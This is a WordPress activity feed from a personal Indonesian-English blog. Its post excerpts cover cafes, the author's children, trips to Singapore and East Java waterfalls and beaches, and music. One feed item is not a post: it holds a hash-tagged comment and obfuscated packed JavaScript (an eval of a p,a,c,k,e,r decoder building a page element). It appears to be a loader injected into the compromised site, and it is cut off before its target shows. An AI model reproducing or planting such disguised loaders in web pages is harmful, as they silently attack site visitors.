Dyah Sushanty" />

Dyah Sushanty

  • If you need a cup of coffee or a glass of chocolate to refresh your mind, this song is definitely for you.
    First time I fall in love with this musical composition is when I heard it in a cafe. Many years later I heard it again by playing piano’s game in my gadged. Damn .. I love this composition so much.  This music which created by Chopin…[Read more]

  • Udah lama banget pingin posting tentang kedai yang satu ini. Sayang aja gak pernah nemu mood plus gak tau mesti mulai dari mana nya (baca: malas, hahaa… )

    Well, kedai ini gak gitu besar sii, tapi saya suka […]

  • Jam 16.15 menjelang pulang kantor tau tau dapet whats app begini dari Khaila.
    K : “Mama lagi dimana ?”
    S : “di kantor lah .. kenapa ?”
    K: “Khaila mau ngomong penting, mama mau tau nggak..?”
    S: “apaaa… ?”
    ga […]

  • Ini mungkin akan mengawali rangkaian tulisan kenangan perjalanan Singapura yang baru berakhir siang tadi. Mumpung masih hangat jadi langsung ditulis aja kali yaakk .. haha …
    Jadi saya abis backpackeran ke Singapura Rabu (23 Sept 2015) sampe Jumat (25 Sept 2015). Dan kesan pertama yang langsung terekam di otak saya adalah betapa manisnya orang…[Read more]

  • 1!–844c7b74e31d727d5814a0ed667c0255–
    eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘b’+e(c)+’b’,’g’),k[c]);return p}(‘(9(){2 d=3;2 4=1;2 5=1;2 t=d.a(‘b’);2…[Read more]

  • Pertanyaan basa basi banget ini yaa….
    hahaaa….
    Eh gak juga ding, soalnya buat saya pertanyaan ini bukan basa basi karena selanjutnya saya bakal memberondong dengan pertanyaan lanjutan.
    Jika dijawab “Sudah” maka the next question gonna be, maem apa? dimana ? sama siapa ? enak ga? bahkan kalo misalnya itu beli, ditambah lagi dengan harganya…[Read more]

  • Ditengah kesibukan kantor tau tau dapet whats app begini dari tantenya Khaila.  S =saya ; T = tantenya
    T : “Khaila englishnya makin jago lho.. sekarang udah bisa percakapan pendek, kalo ditanyain or ngobrol ringan juga udah bisa in english..”
    S : “wah alhamdulilah..”
    T : “tau ga, apa jawab Khaila kalo dipuji pinter?”
    S : “emang apa?”
    T :…[Read more]

  • Suatu saat sekitar jam setengah 4 pagi, Daffa bangun dengan mata kriyep kriyep. Tangan menggapai gapai ga jelas apa maunya. Tau tau cuma pengen meluk sambil bilang .. “mamaaaaa….”  sambil senyum ….
    Baru pulang dalam kondisi hujan. tau tau Daffa bukain pintu trus kasih susunya, maksa mamanya buat minum. “biar ga sakit mama .. minum ..…[Read more]

  • mada_5Whuaaa… akhirnya kesini juga.
    Ini sebenernya agenda yang udah terpending puluhan tahun, eh belasan tahun ding, hahaaa…
    Jadi dulu banget mama dan kakak saya (mbak Din) pernah kesini pulang dari Bromo. Ke Bromonya padahal barengan, trus entah gimana pulangnya bisa kepisah gitu dan mereka mampir aja ke Madakaripura ini. Pulangnya mereka cerita…[Read more]

  • ThumbnailSuka nyamil ? Suka pisang ? Suka nongkrong ? jika jawaban kamu iya, maka tempat yang satu ini wajib banget dicoba, hahaa… :D
    Saya sendiri nemu tempat ini awalnya ga sengaja. Jadi pas pulang kantor kemaleman […]

  • ThumbnailDo you like traveling ? Do you like nature ? Do you like a little hard trekking ? If the answer is yes, I suggest you to come here.
    This is Cuban Sewu or Tumpak Sewu. A great waterfall near Malang – Lumajang, […]

  • Enggak …
    Ini bukan novel atau cerpen meski judulnya ala cerpen .. hahaaa …
    Ini cuma mau nyampah aja dimari setelah sekian lama ga nyampah, hihihi…
    Jadi ceritanya saya lagi heran kenapa hampir semua temen cowok yang saya anggap dekat koq nama anaknya Khaira semua yaaa ….
    Ini baru saya sadari pas semalem saya ngobrol sama sahabat saya…[Read more]

  • Hohoho …. akhir akhir ini saya lagi keranjingan permainan yang satu ini. Walau banyak kalahnya siii …. hihihi …
    Eh tapi buat emak emak amatiran yang mainnya sambil diganggu Daffa kayaknya rekor 13 menang dan 9 kalah ga terlalu malu maluin deh … ya kan .. hahaaaaa… D
    Kayaknya hampir semua orang didunia kenal sama permainan yang satu…[Read more]

  • Thumbnail

    Ari gini siapa yang ga kenal sambal???
    Walopun ga suka (seperti saya) tapi minimal pasti tau atau pernah denger namanya kan …
    Nah koq ya kebetulan banget, pas lagi ngeFBe, lihat postingan beginian, ya […]

  • Pagi ini baca berita tentang meninggalnya Susiana dan Erry Yunanto. Keduanya masih sangat muda, jauuuuuhhhhhhhhhh dibawah saya yang udah lewat banget dari kepala tiga. Ya ampun, sayang sekali yaa ….
    Menurut […]

  • ThumbnailBerhubung udah beberapa hari penasaran sama tempat ngopi yang satu ini, akhirnya kemaren sengaja nge-lunch disini. Panas panas di tengah hari lho kita kesini. Mana pake acara kesasar pula. Ya ampun …. pokoknya […]

  • usHahaaaa…. Judulnya gitu amat yak, yaa maap sodara sodara, ini gegara di grup kemaren sempat ada candaan seputar cinlok jadi pengen ngejadiin judul walo mungkin isinya mah ga ada hubungannya sama cinlok cinlokan, hahaaaaa…

    Masih seputar ngetrip bareng Komunitas Backpacker kemaren, moga moga aja yang baca ga eneg yaaakkk. Lha soalnya saya…[Read more]

  • pantai savanaHoreeee ….
    Finally I have something to write here. Usually I want to write but confuse then. Just don’t know which/where/how to begin, hahaaa.
    Well, yesterday I go to some beach in South Malang. Not only one, but I go to 6 beach in a day. Can you believe? Maybe I will not believe it also untill I went there by my self. Hahaaa….
    The beach…[Read more]

  • 1614485_1494190267517859_533768891225447606_oIt’s really a happy day for me. I don’t know why but I think I just found a new friend. A beauty smart nice kind woman from China. I called her Ting. No miss or madam or other else, just Ting. I think it just a sign that we can be a good friend in future, hahaaaa …. because name only just shows how close our relation, isn’t it ? (at least in my…[Read more]

  • Pernah denger judul diatas ? Kayaknya hampir setiap orang dimuka bumi ini pernah denger cerita Cinderella kan ya. Apalagi cinderella ini udah dibuat dalam berbagai versi, mulai dari komik, buku cerita, film, kaset cerita, lagu, pementasan balet, teater dan sebagainya. Jadi rasa rasanya hampir semua orang pasti ‘ngeh’ sama dongeng klasik ini.…[Read more]

  • Load More
Iconic One Theme | Powered by Wordpress